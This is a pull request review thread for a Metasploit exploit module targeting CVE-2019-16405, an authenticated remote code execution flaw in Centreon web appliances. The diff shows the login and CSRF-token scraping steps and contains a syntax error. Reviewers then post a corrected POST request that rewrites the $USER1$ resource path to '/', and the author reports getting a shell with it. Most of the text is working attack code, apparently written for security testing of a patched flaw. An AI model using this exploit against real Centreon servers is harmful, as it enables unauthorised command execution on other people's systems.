modules/exploits/linux/http/centreon_cmd_exec.rb

```diff
@@ -0,0 +1,177 @@
+        "Description" =>  %q{
+          Authenticated Remote Code Execution on Centreon Web Appliances.
+          Affected versions: =< 18.10, 19.04
+          By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
+          Vendor verified: 09/17/2019
+          Vendor patched: 10/16/2019
+          Public disclosure: 10/18/2019
+        },
+        "License" => MSF_LICENSE,
+        'Author' => [
+          'enjloezz & TheCyberGeek', # Discovery
+          'enjloezz' # Metasploit Module
+        ],
+        'References' =>
+        [
+            ['URL','https://github.com/centreon/centreon/pull/7864'],
+            ['CVE','2019-16405']
+        ],
+        "Platform" => "linux",
+        "Targets" => [
+          ["Centreon", {}],
+        ],
+        "Stance" => Msf::Exploit::Stance::Aggressive,
+        "Privileged" => false,
+        "DisclosureDate" => "Oct 19 2019",
+        "DefaultOptions" => {
+          "SRVPORT" => 80,
+        },
+        "DefaultTarget" => 0
+      ))
+
+    register_options(
+      [
+        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
+        OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
+        OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
+        OptString.new("METHOD", [true, "The method used to download shell from target (default is curl)", "curl"]),
+        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
+      ]
+    )
+  end
+
+  def exploit
+    begin
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "index.php"),
+        "method" => "GET",
+      )
+      @phpsessid = res.get_cookies
+      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+
+      if token
+        res = send_request_cgi!(
+          "uri" => normalize_uri(target_uri.path, "index.php"),
+          "method" => "POST",
+          "cookie" => @phpsessid,
+          "vars_post" => {
+            "useralias" => datastore["USERNAME"],
+            "password" => datastore["PASSWORD"],
+            "centreon_token" => token,
+          },
+        )
+        if res.body.include? "You need to enable JavaScript to run this app"
+          print_good("Login Successful!")
+          res = send_request_cgi(
+            "uri" => normalize_uri(target_uri.path, "main.get.php"),
+            "method" => "GET",
+            "cookie" => @phpsessid,
+            "vars_get" => {
+              "p" => "60904",
+              "o" => "c",
+              "resource_id" => 1,
+            },
+          )
+          /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+          res = send_request_cgi(
+            "uri" => normalize_uri(target_uri.path,
+            "vars_get" => {
+                "main.get.php",
```

Comment:
Is this formatted wrong? throwing syntax errors.

Reply:
The script was working before I fixed this from msftidy: 
modules/exploits/linux/http/centreon_cmd_exec.rb - [WARNING] Please use vars_get in send_request_cgi: send_request_cgi( "uri" => normalize_uri(target_uri.path, "main.get.php", "?p=60904"

Reply:
I believe this is what you are going for.
```
          res = send_request_cgi(
            "uri" => normalize_uri(target_uri.path, "main.get.php"),
            "vars_get" => {"p" => "60904"},
            "method" => "POST",
            "cookie" => @phpsessid,
            "vars_post" => {
              "resource_name": "$USER1$",
              "resource_line": "/",
              "instance_id": 1,
              "resource_activate": 1,
              "resource_comment": "Nagios Plugins Path",
              "submitC": "Save",
              "resource_id": 1,
              "o": "c",
              "initialValues": "" "a:0:{}" "",
              "centreon_token": token },
          )
```

Reply:
Yes this change seems to work. I have just tested on my localhost and got a shell with this final change.